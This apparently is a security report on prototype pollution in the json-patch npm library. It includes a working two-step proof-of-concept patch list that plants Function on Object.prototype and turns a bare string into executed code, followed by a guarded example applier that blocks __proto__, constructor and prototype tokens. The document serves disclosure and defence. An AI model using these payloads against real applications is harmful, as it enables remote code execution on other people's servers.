Open
Description
The code is vulnerable to prototype pollution, because it allows patching __proto__. This can be escalated to remote code execution if user-supplied input is passed as the patch list:
```js
const p = require('json-patch');

// Step 1: copy Function (reachable from {} as constructor.constructor) onto
// Object.prototype, and give every object an inherited "op" that names it.
p.apply({}, [
  {
    "op": "copy",
    "from": "/constructor/constructor",
    "path": "/__proto__/makeFunc"
  },
  {
    "op": "add",
    "path": "/__proto__/op",
    "value": "makeFunc"
  },
]);

// Step 2: a bare string entry now inherits op === "makeFunc", so the
// attacker-controlled string ends up evaluated as function source.
p.apply({}, ["console.log('rce')"]); // rce
```

In order to prevent this, I would advise filtering out any changes to __proto__.
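The following is an added example, not code from the json-patch project or from the reporter: a minimal JSON Pointer / JSON Patch applier with a guard against the pollution described above, next to an unguarded mode that reproduces the first two steps of the report's chain. It goes slightly beyond the suggested fix by also rejecting `constructor` and `prototype` tokens and by following only own properties, since `/constructor/prototype/x` reaches `Object.prototype` just as `/__proto__/x` does. All helper names (`parsePointer`, `locate`, `applyPatch`, `demonstrate`) and the sample patches are hypothetical and constructed for this example.

```javascript
// Added example, not code from the json-patch project: a minimal JSON Pointer /
// JSON Patch applier with a guard against prototype pollution, next to an
// unguarded mode that reproduces the pollution from the report. All helper
// names here (parsePointer, locate, applyPatch, demonstrate) are hypothetical.

const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// RFC 6901 pointer -> array of reference tokens ("~1" -> "/", then "~0" -> "~").
function parsePointer(pointer) {
  if (typeof pointer !== 'string') throw new Error('pointer must be a string');
  if (pointer === '') return [];
  if (pointer[0] !== '/') throw new Error(`invalid pointer: ${pointer}`);
  return pointer.slice(1).split('/')
    .map((t) => t.replace(/~1/g, '/').replace(/~0/g, '~'));
}

// Resolve the parent container of the last token. With guard on, reject any
// token that names a prototype hop and follow only own properties, so the walk
// can never leave the document and land on Object.prototype.
function locate(doc, tokens, guard) {
  if (tokens.length === 0) throw new Error('root pointer has no parent');
  let parent = doc;
  for (const token of tokens.slice(0, -1)) {
    if (guard && FORBIDDEN_SEGMENTS.has(token)) throw new Error(`forbidden token "${token}"`);
    if (guard && !Object.prototype.hasOwnProperty.call(parent, token)) {
      throw new Error(`path does not exist: ${token}`);
    }
    parent = parent[token];
    if (Object(parent) !== parent) throw new Error(`not a container: ${token}`);
  }
  const last = tokens[tokens.length - 1];
  if (guard && FORBIDDEN_SEGMENTS.has(last)) throw new Error(`forbidden token "${last}"`);
  return [parent, last];
}

function getValue(doc, pointer, guard) {
  const tokens = parsePointer(pointer);
  if (tokens.length === 0) return doc;
  const [parent, key] = locate(doc, tokens, guard);
  if (guard && !Object.prototype.hasOwnProperty.call(parent, key)) {
    throw new Error(`path does not exist: ${key}`);
  }
  return parent[key];
}

// Apply add / replace / copy / remove. guard defaults to true; the false mode
// exists only to show what happens without the checks. Entries must be plain
// objects, so a bare string entry (the report's step 2) is rejected outright.
function applyPatch(doc, patches, guard = true) {
  for (const p of patches) {
    if (Object(p) !== p || Array.isArray(p)) throw new Error('patch entry must be an object');
    const [parent, key] = locate(doc, parsePointer(p.path), guard);
    switch (p.op) {
      case 'add':
      case 'replace':
        parent[key] = p.value;
        break;
      case 'copy':
        parent[key] = getValue(doc, p.from, guard);
        break;
      case 'remove':
        delete parent[key];
        break;
      default:
        throw new Error(`unsupported op: ${p.op}`);
    }
  }
  return doc;
}

// Constructed patch list: the first two steps of the report's chain.
const POLLUTING_PATCH = [
  { op: 'copy', from: '/constructor/constructor', path: '/__proto__/makeFunc' },
  { op: 'add', path: '/__proto__/op', value: 'makeFunc' },
];

function demonstrate() {
  // Unguarded: Object.prototype now carries makeFunc (=== Function) and op.
  applyPatch({}, POLLUTING_PATCH, false);
  const polluted = ({}).makeFunc === Function && ({}).op === 'makeFunc';
  // Undo the pollution so the rest of the process is unaffected.
  delete Object.prototype.makeFunc;
  delete Object.prototype.op;

  // Guarded: the same list is rejected before anything is written.
  let rejected = false;
  try { applyPatch({}, POLLUTING_PATCH); } catch (e) { rejected = true; }
  const clean = ({}).makeFunc === undefined && ({}).op === undefined;
  return { polluted, rejected, clean };
}

console.log(JSON.stringify(demonstrate()));
```

The two checks in `locate` are complementary: the token denylist stops the obvious `__proto__` and `constructor` hops, and the own-property requirement stops anything else that only exists on the prototype chain (`toString`, `hasOwnProperty`, or whatever a future engine adds). Requiring each patch entry to be a plain object removes the second half of the chain independently of the first.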